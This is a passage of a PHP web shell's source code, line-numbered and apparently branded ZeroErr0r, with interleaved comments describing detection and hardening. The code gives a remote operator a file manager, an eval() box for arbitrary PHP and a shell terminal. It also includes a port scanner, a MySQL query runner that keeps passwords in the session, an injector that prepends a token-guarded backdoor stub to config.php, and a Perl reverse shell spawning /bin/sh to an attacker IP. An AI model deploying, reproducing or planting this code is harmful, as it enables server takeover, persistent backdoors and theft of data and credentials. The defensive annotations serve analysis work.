505 | $size = "Link"; | |
506 | $perms = formatPerms(fileperms($dir)); | |
507 | $modified = modifiedDate($dir); | |
508 | $down_path = getcwd() . "/" . $dir; | |
509 | if ($dir == '..'){ | |
510 | $link = "?cd=" . base64_encode(getcwd() . "/.."); | |
511 | $touch_path = base64_encode('..'); | |
512 | $mkdir_path = base64_encode('..'); | |
513 | $upload_dir = '..'; | |
514 | } else { | |
515 | $link = "?cd=" . base64_encode(getcwd()); | |
516 | $touch_path = base64_encode($down_path); | |
517 | $mkdir_path = base64_encode($down_path); | |
518 | $upload_dir = getcwd(); | |
519 | } | |
520 | ||
521 | echo "<tr>"; | |
522 | echo "<td><input type='checkbox' style='opacity:0;margin: 0;padding: 0;' disabled> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>"; | |
523 | echo "<td>$size</td>"; | |
524 | echo "<td>$perms</td>"; | |
525 | echo "<td>$modified</td>"; | |
526 | echo "<td class='action'><a href='?view=$upload_dir&action=upload'>upl</a> - <a href='#' onclick='touch(\"$touch_path\")'>+file</a> - <a href='#' onclick='mkdir(\"$mkdir_path\")'>+dir</a></td>"; | |
527 | echo "</tr>"; | |
528 | } | |
529 | } | |
530 | ||
531 | foreach ($files_list as $file) { | |
532 | // if ($file != "." && $file != "..") { | |
533 | $size = formatSizeUnits(filesize($file)); | |
534 | $perms = formatPerms(fileperms($file)); | |
535 | $modified = modifiedDate($file); | |
536 | $del = "?rmfile=" . base64_encode(getcwd() . "/" . $file); | |
537 | // $down_path = realpath(getcwd() . "/" . $file); | |
538 | $path = getcwd() . "/" . $file; | |
539 | $rename_path = base64_encode($down_path); | |
540 | $isimg = @is_array(getimagesize($file)); | |
541 | ||
542 | // echo "<p>$file <b>" . formatSizeUnits(filesize($file)) . "</b></p>"; | |
543 | echo "<tr>"; | |
544 | echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$rename_path'> <a href='?view=$path&action=display&img=$isimg'><i class='fa fa-file-text'></i> $file</a></td>"; | |
545 | echo "<td>$size</td>"; | |
546 | echo "<td>$perms</td>"; | |
547 | echo "<td>$modified</td>"; | |
548 | echo "<td class='action'><a href='?view=$path&action=edit'>edit</a> - <a href='#' onclick='rename(\"$rename_path\", \"$file\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$path&action=download'>dl</a></td>"; | |
549 | echo "</tr>"; | |
550 | // } | |
551 | } | |
552 | ||
553 | ?> | |
554 | </table> | |
555 | <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?> | |
556 | <?php $path_info = pathinfo($_GET['view']); ?> | |
557 | ||
558 | <pre><code class="<?php echo $path_info['extension'] ?>"><?php | |
559 | if (file_exists($_GET['view'])) { | |
560 | if ($_GET['img'] === '1') { | |
561 | $image = (strpos($_GET['view'], $_SERVER['DOCUMENT_ROOT']) !== false) ? preg_replace('#'. $_SERVER['DOCUMENT_ROOT'] .'#', 'http://' . $_SERVER['HTTP_HOST'], $_GET['view']) : $_GET['view']; | |
562 | // Read image path, convert to base64 encoding | |
563 | $imageData = base64_encode(file_get_contents($image)); | |
564 | ||
565 | // Format the image SRC: data:{mime};base64,{data}; | |
566 | $src = 'data: '. pathinfo($image, PATHINFO_EXTENSION) .';base64,'.$imageData; | |
567 | ||
568 | // Echo out a sample image | |
569 | echo '<img src="' . $src . '">'; | |
570 | } else { | |
571 | $file = fopen($_GET['view'], 'r'); | |
572 | if (filesize($_GET['view']) > 0) | |
573 | echo htmlspecialchars(fread($file, filesize($_GET['view']))); | |
574 | else | |
575 | echo "Empty"; | |
576 | fclose($file); | |
577 | } | |
578 | } | |
579 | ?></code></pre> | |
580 | ||
581 | <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'edit') { ?> | |
582 | ||
583 | <?php | |
584 | $file = fopen($_GET['view'], 'r'); | |
585 | if (filesize($_GET['view']) > 0) | |
586 | $content = htmlspecialchars(fread($file, filesize($_GET['view']))); | |
587 | else | |
588 | $content = ""; | |
589 | fclose($file); | |
590 | ?> | |
591 | ||
592 | <form action="" method="post"> | |
593 | <textarea name="content" spellcheck="false" autofocus><?php echo $content ?></textarea> | |
594 | <input type="hidden" name="dest" value="<?php echo $_GET['view'] ?>"> | |
595 | <input type="submit" name="edit" value="Save!"> | |
596 | </form> | |
597 | ||
598 | <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'upload') { ?> | |
599 | ||
600 | <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;"> | |
601 | <p style="margin: 0;font-size: 1.2rem;">Local File Upload</p> | |
602 | <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>"> | |
603 | <input type="file" name="files"> | |
604 | <input type="submit" name="upload" value="Upload!"> | |
605 | </form> | |
606 | <br><br> | |
607 | <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;"> | |
608 | <p style="margin: 0;font-size: 1.2rem;">Remote File Upload</p> | |
609 | <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>"> | |
610 | <input type="text" name="remote_file" placeholder="Remote File URL" style="border: 1px solid #EF330E; padding: 6px 20px; position: relative;top:-1px; width: 200px;"> | |
611 | <input type="submit" name="remote_upload" value="Upload!"> | |
612 | </form> | |
613 | ||
614 | <!-- EVALUATE --> | |
615 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'evaluate') { ?> | |
616 | <form action="?view=evaluate" method="post"> | |
617 | <textarea name="eval_code" spellcheck="false" style="height: 200px;" autofocus><?php if (isset($_POST['eval_code'])) { echo $_POST['eval_code']; } ?></textarea> | |
618 | <input type="submit" name="eval" value="Go!"> | |
619 | <select name="language"> | |
620 | <option value="php">php</option> | |
621 | <!-- <option value="python">python</option> | |
622 | <option value="perl">perl</option> | |
623 | <option value="nodejs">nodejs</option> | |
624 | <option value="ruby">ruby</option> --> | |
625 | </select> | |
626 | </form> | |
627 | <?php | |
// "Evaluate" view: passes the POSTed 'eval_code' text to eval(), i.e. arbitrary PHP runs with
// the privileges of the web server's PHP process. Only the value 'php' is handled; the other
// languages are commented out in the form above.
// Detection: the code travels in a POST body to ?view=evaluate, so a standard access log shows
// the request but typically not what was run; request-body or audit logging is needed for that.
// Hardening: eval is a language construct rather than a function, so it is presumably out of
// reach of disable_functions; preventing the file from being written or executed in the first
// place is the relevant control.
628 | if (isset($_POST['eval'])) { | |
629 | $code = $_POST['eval_code']; | |
630 | $lang = $_POST['language']; | |
631 | echo '<pre class="result">'; | |
632 | if ($lang == 'php') { | |
633 | eval($code); | |
634 | } | |
635 | echo '</pre>'; | |
636 | } | |
637 | ?> | |
638 | ||
639 | <!-- INFO --> | |
640 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'info') { ?> | |
641 | <div class="server_info"> | |
642 | <p class="info_head" onclick="toggle(this)">Server Info</p> | |
643 | <table class="off"> | |
644 | <tr> | |
645 | <td>Root Disk</td> | |
646 | <td><?php echo (formatSizeUnits(disk_total_space("/") - disk_free_space("/"))) . " / " . formatSizeUnits(disk_total_space("/")); ?></td> | |
647 | </tr> | |
648 | <tr> | |
649 | <td>PHP</td> | |
650 | <td><?php echo phpversion() ?></td> | |
651 | </tr> | |
652 | <tr> | |
653 | <td>Python</td> | |
654 | <td><?php if(which("python")) { echo shell_exec("python --version 2>&1"); } ?></td> | |
655 | </tr> | |
656 | <tr> | |
657 | <td>Curl</td> | |
658 | <td><?php if(function_exists('curl_version')) { $v = curl_version(); echo $v['version']; } ?></td> | |
659 | </tr> | |
660 | <tr> | |
661 | <td>tar</td> | |
662 | <td><?php if(which("tar")) { echo shell_exec("tar --version | grep ^tar | sed 's/^.* //g'"); } ?></td> | |
663 | </tr> | |
664 | <tr> | |
665 | <td>Perl</td> | |
666 | <td><?php if(which("perl")) { echo shell_exec("perl -e 'print $];'"); } ?></td> | |
667 | </tr> | |
668 | <tr> | |
669 | <td>GCC</td> | |
670 | <td><?php if(which("perl")) { echo shell_exec("gcc --version | grep ^gcc | sed 's/^.* //g'"); } ?></td> | |
671 | </tr> | |
672 | </table> | |
673 | <p class="info_head" onclick="toggle(this)">PHP Configuration</p> | |
674 | <table class="off"> | |
675 | <?php | |
      // Dumps every directive that parse_ini_file() reads from the loaded php.ini
      // (php_ini_loaded_file()) as key/value table rows, disclosing the server's PHP
      // configuration to whoever opens the "info" view.
      // Keys and values are echoed without HTML escaping.
676 | foreach (parse_ini_file(php_ini_loaded_file()) as $key => $value) { | |
677 | echo "<tr>"; | |
678 | echo "<td>" . $key . "</td>"; | |
679 | echo "<td>" . $value . "</td>"; | |
680 | echo "</tr>"; | |
681 | } | |
682 | ?> | |
683 | </table> | |
684 | </div> | |
685 | ||
686 | <!-- TERMINAL --> | |
687 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'terminal') { ?> | |
688 | <pre style="height: 300px;word-wrap: break-word;"><code class="sh"><?php if (isset($_GET['cmd'])) { | |
      // Terminal view: `cmd` arrives in the query string and is handed, with " 2>&1"
      // appended, to ex() at the end of this block. ex() is defined outside this excerpt;
      // presumably it runs the string through a shell -- confirm against its definition.
      // Hunting note: the form for this view submits with method="get", so each command is
      // part of the request URL (view=terminal&cmd=...) and is recorded by ordinary
      // web-server access logging.
689 | $cmd = $_GET['cmd']; | |
      // Substring test: this branch runs for any command that contains "cd" anywhere, not
      // only a `cd` command. array_search() yields false when no space-separated token is
      // exactly 'cd', and false + 1 then selects token index 1.
      // The resulting directory (built relative to getcwd()) is kept in $_SESSION['cd'].
690 | if (strpos($_GET['cmd'], 'cd') !== false) { | |
691 | $tmp = explode(" ", $_GET['cmd']); | |
692 | $direct = getcwd() . "/" . $tmp[array_search('cd', $tmp) + 1]; | |
693 | chdir($direct); | |
694 | $_SESSION['cd'] = $direct; | |
695 | echo "<script>document.location = '?view=terminal';</script>"; | |
696 | } | |
697 | $tmp = explode(" ", $_GET['cmd']); | |
      // "edit <file>" as the first token redirects the browser to the editor view of that path.
698 | if (array_search('edit', $tmp) === 0) { | |
699 | $direct = getcwd() . "/" . $tmp[array_search('edit', $tmp) + 1]; | |
700 | echo "<script>document.location = '?view=" . urlencode($direct) . "&action=edit';</script>"; | |
701 | } | |
      // The command is passed to ex() even when one of the branches above matched; the
      // returned output is HTML-escaped before display.
702 | echo htmlentities(ex($cmd . " 2>&1")); | |
703 | ||
704 | } ?></code></pre> | |
705 | <br> | |
706 | <form action="?" method="get"> | |
707 | <input type="hidden" name="view" value="terminal"> | |
708 | <?php echo get_current_user(); ?>: | |
709 | <input id="cmd" type="text" name="cmd" spellcheck="false" autocomplete="off" value="" autofocus placeholder=" shell command -"> | |
710 | </form> | |
711 | ||
712 | <!-- PORT_SCANNER --> | |
713 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'port_scanner') { ?> | |
714 | <form action="" method="post" class="port_scanner"> | |
715 | <table> | |
716 | <tr> | |
717 | <td width="10%">Host:</td> | |
718 | <td width="90%"><input type="text" name="host" value="localhost" autocomplete="off" spellcheck="false"></td> | |
719 | </tr> | |
720 | <tr> | |
721 | <td width="10%">Port Start:</td> | |
722 | <td width="90%"><input type="text" name="sport" value="0" autocomplete="off" spellcheck="false"></td> | |
723 | </tr> | |
724 | <tr> | |
725 | <td width="10%">Port End:</td> | |
726 | <td width="90%"><input type="text" name="eport" value="5000" autocomplete="off" spellcheck="false"></td> | |
727 | </tr> | |
728 | </table> | |
729 | <input type="submit" name="scan" value="SCAN!"> | |
730 | </form> | |
731 | <?php if (isset($_POST['scan'])) { ?> | |
732 | <div class="result" style="background-color: #071414;padding: 0;padding-top: 20px;"> | |
733 | <table> | |
734 | <?php | |
      // Port-scan handler: a sequential TCP connect attempt (fsockopen, 3-second timeout)
      // for every port from `sport` to `eport` against the POSTed `host`, made from the web
      // server itself. strip_tags() only removes markup; it does not restrict the host or
      // the range, so any address reachable from this server, internal ones included,
      // can be probed.
      // Detection note: on the network this looks like a burst of outbound connection
      // attempts to consecutive ports of one host, originating from the PHP / web-server
      // process. Egress filtering and connection logging on the web tier are the controls
      // that surface it.
735 | $start = strip_tags($_POST['sport']); | |
736 | $end = strip_tags($_POST['eport']); | |
737 | $host = strip_tags($_POST['host']); | |
738 | for($i = $start; $i<=$end; $i++){ | |
      // '@' suppresses the warning for closed or filtered ports; $fp is never fclose()d here.
739 | $fp = @fsockopen($host, $i, $errno, $errstr, 3); | |
740 | if($fp){ | |
      // Ports 22 and 2222 only get a different label and colour; nothing else is tested.
741 | if ($i == 22 OR $i == 2222) { | |
742 | echo '<tr><td width="5%" style="background-color: #FFA800;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.' this could be vulnerable to SSH Injection</td></tr>'; | |
743 | } else { | |
744 | echo '<tr><td width="5%" style="background-color: #16A086;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.'</td></tr>'; | |
745 | } | |
746 | } | |
      // Push partial results to the browser after every port.
747 | flush(); | |
748 | } | |
749 | ?> | |
750 | </table> | |
751 | </div> | |
752 | <?php } ?> | |
753 | ||
754 | <!-- INJECTOR --> | |
755 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?> | |
756 | <?php if (!isset($_GET['action'])) { ?> | |
757 | <form action="" method="post" class="port_scanner"> | |
758 | <table> | |
759 | <tr> | |
760 | <td width="30%">Injectable File Path:</td> | |
761 | <td width="70%"><input type="text" name="inject_path" value="<?php echo getcwd() . DIRECTORY_SEPARATOR . 'config.php'; ?>" autocomplete="off" spellcheck="false"></td> | |
762 | </tr> | |
763 | <tr> | |
764 | <td width="30%">Code Type:</td> | |
765 | <td width="70%"><select name="inject_code_type"> | |
766 | <option value="reverse_command">Reverse Command</option> | |
767 | </select></td> | |
768 | </tr> | |
769 | <tr> | |
770 | <td width="30%">Language:</td> | |
771 | <td width="70%"><select name="inject_lang"> | |
772 | <option value="reverse_command">PHP</option> | |
773 | </select></td> | |
774 | </tr> | |
775 | </table> | |
776 | <input type="submit" name="inject" value="INJECT CODE!"> | |
777 | </form> | |
778 | <?php if (isset($_POST['inject'])) { ?> | |
779 | <pre class="result" style="font-size: 1.3rem;"><?php | |
      // Injector handler: plants a persistence stub in a PHP file chosen by the operator.
      // The form for this view pre-fills the target with getcwd() . '/config.php'.
      // $type and $lang are read from the form but not used anywhere in this block.
780 | $path = strip_tags($_POST['inject_path']); | |
781 | $type = strip_tags($_POST['inject_code_type']); | |
782 | $lang = strip_tags($_POST['inject_lang']); | |
      // The access token is md5() of one rand() value between 111111 and 999999: fewer than
      // a million possible tokens, from a non-cryptographic generator. It is not a meaningful
      // access control, so a host carrying this stub should be treated as exposed to anyone,
      // not only to the operator who planted it.
783 | $token = md5(rand(111111, 999999)); | |
      // Stub indicators for file sweeps and request inspection, all literal in the string
      // below: a function named bdoor() invoked as @bdoor(); POST fields `cmd` (base64) and
      // `token`; response text wrapped in {USER}, {SERVER}, {SYMBOL} and {PATH} markers;
      // the message "Error: invalid token!"; and a call to shell_exec().
784 | $code = '<?php function bdoor(){@session_start();if(isset($_SESSION["cd"])){chdir($_SESSION["cd"]);}if($_SERVER["REQUEST_METHOD"]=="POST"){$cmd=base64_decode($_POST["cmd"])." 2>&1";if($_POST["token"]!="' . $token . '"){echo"Error: invalid token!";die();}if(strpos($cmd,"cd")!==false){$tmp=explode(" ",$cmd);$direct=getcwd()."/".$tmp[array_search("cd",$tmp)+1];chdir($direct);$_SESSION["cd"]=$direct;}if(0==posix_getuid()){$sym="#";}else{$sym="$";}echo "{USER}".get_current_user()."{USER}"."{SERVER}".$_SERVER["SERVER_NAME"]."{SERVER}"."{SYMBOL}" . $sym . "{SYMBOL}" . "{PATH}".getcwd()."{PATH}".shell_exec($cmd);die();}}@bdoor(); ?>'; | |
785 | $pathinfo = pathinfo($path); | |
      // Only the parent directory's writability is checked before writing.
786 | if (is_writable($pathinfo['dirname'])) { | |
787 | if (!file_exists($path)) { | |
788 | $file = fopen($path, 'w+'); | |
789 | fwrite($file, $code); | |
790 | fclose($file); | |
791 | } else { | |
      // Existing file: the stub is prepended and the original content kept after it, so the
      // file changes (size, hash, mtime, first bytes) while its old content is still present.
      // File-integrity monitoring on application PHP files is the control that catches this.
792 | $content = file_get_contents($path); | |
793 | $content = $code . $content; | |
794 | ||
795 | $file = fopen($path, "w"); | |
796 | fwrite($file, $content); | |
797 | fclose($file); | |
798 | } | |
799 | ||
      // Reports the access details (URL derived from DOCUMENT_ROOT, field name, token) back
      // to the operator.
800 | echo "[+] Message: code has been injected!<br>"; | |
801 | echo "[+] Method: POST<br>"; | |
802 | echo "[+] URL: " . $_SERVER['HTTP_HOST'] . str_replace(str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $_SERVER['DOCUMENT_ROOT']), "", $path) . "<br>"; | |
803 | echo "[+] Variable: cmd<br>"; | |
804 | echo "[+] Token: " . $token; | |
805 | } else { echo "[-] Error: permission denied!"; } | |
806 | ?> | |
807 | </pre><?php } ?> | |
808 | <?php } else if (isset($_GET['action']) AND $_GET['action'] == 'ssh') { ?> | |
809 | <form action="" method="post"> | |
810 | <textarea style="height: 200px;" name="pub_key" placeholder="Enter the public key here!"></textarea> | |
811 | <input type="submit" name="inject_key" value="INJECT KEY!"> | |
812 | </form> | |
813 | <?php } ?> | |
814 | ||
815 | ||
816 | <!-- DATABASE --> | |
817 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'database') { ?> | |
818 | <form action="?view=database" method="post" class="port_scanner"> | |
819 | <?php if (isset($_SESSION['mysql_user'])) { ?> | |
820 | <select name="mysql_db"> | |
821 | <?php | |
      // Database picker: reconnects on every request with the server / user / password
      // kept in $_SESSION, runs "show databases", and renders each name as an <option>.
      // Database names are echoed into the HTML without escaping.
822 | $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']); | |
823 | ||
      // NOTE(review): on failure only the error is printed; $result is then false and the
      // loop below still calls mysqli_fetch_row() on it.
824 | if (!($result=mysqli_query($link,"show databases"))) { | |
825 | printf("Error: %s\n", mysqli_error($link)); | |
826 | } | |
827 | ||
828 | while( $row = mysqli_fetch_row( $result ) ){ | |
      // Re-select the database that was posted with the previous query, if any.
829 | if (isset($_POST['mysql_db'])) { | |
830 | if ($row[0] == $_POST['mysql_db']) { | |
831 | echo "<option value='" . $row[0] . "' selected>" . $row[0] . "</option>"; | |
832 | } else { | |
833 | echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>"; | |
834 | } | |
835 | } else { | |
836 | echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>"; | |
837 | } | |
838 | } | |
839 | ?> | |
840 | </select><br><br> | |
841 | <textarea name="mysql_query" style="border: 1px solid #E3052B;height: 200px;box-sizing: border-box; padding: 20px;" placeholder="Query"><?php if (isset($_POST['mysql_query'])) { echo $_POST['mysql_query']; } ?></textarea> | |
842 | <input type="submit" name="execute_mysql" value="EXECUTE QUERY!"> | |
843 | <?php } else { ?> | |
844 | <table> | |
845 | <tr> | |
846 | <td width="20%">MySQL Server:</td> | |
847 | <td width="80%"><input type="text" name="mysql_server" value="localhost" autocomplete="off" spellcheck="false"></td> | |
848 | </tr> | |
849 | <tr> | |
850 | <td width="20%">User:</td> | |
851 | <td width="80%"><input type="text" name="mysql_user" autocomplete="off" spellcheck="false"></td> | |
852 | </tr> | |
853 | <tr> | |
854 | <td width="20%">Password:</td> | |
855 | <td width="80%"><input type="text" name="mysql_pass" autocomplete="off" spellcheck="false"></td> | |
856 | </tr> | |
857 | </table><br> | |
858 | <input type="submit" name="connect_mysql" value="CONNECT!"> | |
859 | </form> | |
860 | <?php } ?> | |
861 | <?php if (isset($_POST['connect_mysql'])) { | |
      // Connect handler: tries mysqli_connect() with the POSTed server / user / password and,
      // on success, stores all three -- the password in clear text -- in $_SESSION, where the
      // other database handlers on this page read them back.
      // Triage note: on a host where this page was used, the PHP session store may hold
      // database credentials the operator entered; where sessions are kept depends on the
      // server's session configuration.
862 | $server = $_POST['mysql_server']; | |
863 | $user = $_POST['mysql_user']; | |
864 | $pass = $_POST['mysql_pass']; | |
865 | ||
866 | $link = mysqli_connect($server,$user,$pass); | |
867 | ||
868 | if ($link) { | |
869 | $_SESSION['mysql_user'] = $user; | |
870 | $_SESSION['mysql_pass'] = $pass; | |
871 | $_SESSION['mysql_server'] = $server; | |
      // Client-side redirect back to the database view, which now shows the query form.
872 | echo "<script>document.location = '?view=database';</script>"; | |
873 | } else { | |
874 | echo "<div class='result'>Could not connect, check the credential</div>"; | |
875 | } | |
876 | ||
877 | // if (!($result=mysqli_query($link,$query))) { | |
878 | // printf("Error: %s\n", mysqli_error($link)); | |
879 | // } | |
880 | ||
881 | // while( $row = mysqli_fetch_row( $result ) ){ | |
882 | // if (($row[0]!="information_schema") && ($row[0]!="mysql")) { | |
883 | // echo $row[0]."\r\n"; | |
884 | // } | |
885 | // } | |
886 | ||
887 | } ?> | |
888 | ||
889 | <?php if (isset($_POST['execute_mysql'])) { ?> | |
890 | <table class="result" style="overflow: auto;"><?php | |
      // Query runner: connects with the session-stored credentials, selects the POSTed
      // database, and sends the POSTed `mysql_query` text to the server unchanged.
      // Detection note: database audit or general query logs show these statements as
      // coming from the web host under whatever account the operator supplied.
891 | $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass'], $_POST['mysql_db']); | |
892 | $query = mysqli_query($link, $_POST['mysql_query']); | |
      // NOTE(review): the return value of mysqli_query() is not checked before it is used
      // as a result set here and below.
893 | $row = mysqli_fetch_assoc($query); | |
894 | ||
      // Header row: column names taken from the keys of the first fetched row.
895 | echo "<tr>"; | |
896 | foreach ($row as $key => $value) { | |
897 | echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $key . "</td>"; | |
898 | } | |
899 | echo "</tr>"; | |
900 | ||
      // Rewind to the first row and print every row; values are echoed without HTML escaping.
901 | mysqli_data_seek( $query, 0 ); | |
902 | while( $row = mysqli_fetch_assoc( $query ) ) { | |
903 | echo "<tr>"; | |
904 | foreach ($row as $key => $value) { | |
905 | echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $value . "</td>"; | |
906 | } | |
907 | echo "</tr>"; | |
908 | } | |
909 | ?></table> | |
910 | <?php } ?> | |
911 | ||
912 | ||
913 | <!-- NETWORKING --> | |
914 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'networking') { ?> | |
915 | ||
916 | <div class="networking port_scanner"> | |
917 | <form action="" method="post" style="border: 1px solid #666;padding: 40px; background: #111;"> | |
918 | <h3 style="font-weight: normal;">Back Connect [Perl]</h3><br> | |
919 | <table> | |
920 | <tr> | |
921 | <td>IP: <input type="text" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR'] ?>" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto; margin-right: 20px;"> | |
922 | Port: <input type="text" name="port" value="1337" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto;"> | |
923 | <input type="submit" name="reverse_connect_perl" value="CONNECT!" style="margin: 0; padding: 9px 20px; margin-left: 30px;"></td> | |
924 | </tr> | |
925 | </table> | |
926 | <?php | |
      // "Back Connect" handler: launches a background perl process (trailing '&') that opens
      // a TCP connection to the POSTed ip:port and runs /bin/sh -i with stdin, stdout and
      // stderr bound to that socket. `port` goes through intval(); `ip` is concatenated into
      // the command line as-is. ex() is defined outside this excerpt.
      // Detection note: the observable artefacts are a `perl -e` process whose parent is the
      // web server / PHP process, an interactive /bin/sh under it, and an outbound TCP
      // connection from the web tier. Process-lineage alerting and default-deny egress from
      // web servers are the controls that catch or block it.
927 | if (isset($_POST['reverse_connect_perl'])) { | |
928 | ex('perl -e \'use Socket;$i="' . $_POST['ip'] . '";$p=' . intval($_POST['port']) . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' &'); | |
      // The banner is printed unconditionally; nothing here checks that the connection succeeded.
929 | echo "<br><pre>"; | |
930 | echo "+----------------------------------------------------+\n"; | |
931 | echo "| [INFO] connection established in the background! |\n"; | |
932 | echo "+----------------------------------------------------+\n\n"; | |
      // Lists perl processes so the operator can see whether the background process is running.
933 | echo ex("ps aux | grep perl"); | |
934 | echo "</pre>"; | |
935 | } | |
936 | ?> | |
937 | </form> | |
938 | </div> | |
939 | ||
940 | ||
941 | <?php } ?> | |
942 | </div> | |
943 | </section> | |
944 | <footer>Copyright ©ZeroErr0r - <?php echo date('Y') ?></footer> | |
945 | ||
946 | <script type="text/javascript"> | |
947 | function rename(rename_path, file) { | |
      // Asks for a new file name and navigates to ?from=<rename_path>&to=<name>.
      // The values are concatenated into the URL without encodeURIComponent().
      // Log-hunting note: the rename request is a GET carrying `from` and `to` parameters.
948 | var to = prompt("Enter a new file name", file); | |
      // prompt() returns null on cancel; this .length access runs before the null check below.
949 | console.log(to.length); | |
950 | if (to !== null && to.length > 0) { | |
951 | document.location = "?from=" + rename_path + "&to=" + to; | |
952 | } | |
953 | } | |
954 | ||
955 | function touch(touch_path) { | |
      // Asks for a file name and navigates to ?touch=<touch_path>&file=<name>; nothing
      // happens when the prompt is cancelled or left empty. Values are not URL-encoded.
      // Log-hunting note: the request is a GET carrying `touch` and `file` parameters.
956 | var to = prompt("Enter a file name"); | |
957 | if (to !== null && to.length > 0) { | |
958 | document.location = "?touch=" + touch_path + "&file=" + to; | |
959 | } | |
960 | } | |
961 | ||
962 | function mkdir(mkdir_path) { | |
      // Asks for a folder name and navigates to ?mkdir_path=<mkdir_path>&folder=<name>;
      // nothing happens when the prompt is cancelled or left empty. Values are not URL-encoded.
      // Log-hunting note: the request is a GET carrying `mkdir_path` and `folder` parameters.
963 | var to = prompt("Enter a folder name"); | |
964 | if (to !== null && to.length > 0) { | |
965 | document.location = "?mkdir_path=" + mkdir_path + "&folder=" + to; | |
966 | } | |
967 | } | |
968 | ||
      // Live collection of the file-listing checkboxes (elements with class "file_select").
969 | var file_select = document.getElementsByClassName('file_select'); | |
970 | function fileSelectCheck() { | |
      // Re-styles every checkbox and its grandparent element according to its checked
      // state. showAction() is defined outside this excerpt.
971 | showAction(); | |
972 | for (var i = 0; i < file_select.length; i++) { | |
973 | if (file_select[i].checked) { | |
      // Checked: keep the box visible and highlight the enclosing row.
974 | file_select[i].setAttribute('style', 'opacity:1;'); | |
975 | document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', "background-color: #1A272E"); | |
976 | } else { | |
      // Unchecked: clear both inline styles.
977 | file_select[i].setAttribute('style', ''); | |
978 | document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', ''); | |
979 | } | |
980 | } | |
981 | } | |
982 | ||
983 | function filesDelete() { | |
      // Collects the values of all checked "file_select" boxes and navigates to
      // ?rmfile0=<v0>&rmfile1=<v1>&...&multirmfile=<total>. Values are not URL-encoded.
      // Log-hunting note: bulk deletion is a single GET carrying numbered `rmfileN`
      // parameters plus `multirmfile`.
984 | var files = []; | |
985 | var s = document.getElementsByClassName('file_select'); | |
986 | var c = 0; | |
987 | for (var i = 0; i < s.length; i++) { | |
988 | if (s[i].checked) { | |
989 | files[c] = s[i].value; | |
990 | c++; | |
991 | } | |
992 | } | |
993 | ||
      // total starts at 1, so multirmfile ends up as the number of selected files plus one
      // (filesCompress starts its counter at 0).
994 | var q = "", total = 1; | |
995 | for (var i = 0; i < files.length; i++) { | |
996 | q += "rmfile" + i + "=" + files[i] + "&"; | |
997 | total++; | |
998 | } | |
999 | document.location = "?" + q + "multirmfile=" + total; | |
1000 | } | |
1001 | ||
1002 | function filesCompress() { | |
      // Collects the values of all checked "file_select" boxes and navigates to
      // ?action=zip&file0=<v0>&file1=<v1>&...&numfiles=<count>. Values are not URL-encoded.
      // Log-hunting note: archiving is a single GET with action=zip, numbered `fileN`
      // parameters and `numfiles`, which is worth checking when reviewing for data staging.
1003 | var files = []; | |
1004 | var s = document.getElementsByClassName('file_select'); | |
1005 | var c = 0; | |
1006 | for (var i = 0; i < s.length; i++) { | |
1007 | if (s[i].checked) { | |
1008 | files[c] = s[i].value; | |
1009 | c++; | |
1010 | } | |
1011 | } | |
1012 | ||
      // Here total counts the selected files exactly.
1013 | var q = "", total = 0; | |
1014 | for (var i = 0; i < files.length; i++) { | |
1015 | q += "file" + i + "=" + files[i] + "&"; | |
1016 | total++; | |
1017 | } | |
1018 | document.location = "?action=zip&" + q + "numfiles=" + total; | |
1019 | } | |
1020 | ||
1021 | function toggle(el) { | |
      // Flips the class of the node two siblings after `el` between 'on' and 'off'.
      // In the info view the clicked <p class="info_head"> is followed by a <table>;
      // presumably the intermediate sibling is the whitespace text node between them.
1022 | if (el.nextSibling.nextSibling.getAttribute('class') == 'on') { | |
1023 | el.nextSibling.nextSibling.setAttribute('class', 'off') | |
1024 | } else { | |
1025 | el.nextSibling.nextSibling.setAttribute('class', 'on') | |
1026 | } | |
1027 | } | |
1028 | </script> | |
1029 | <script>hljs.initHighlightingOnLoad();</script> | |
1030 | ||
1031 | </body> | |
1032 | </html> |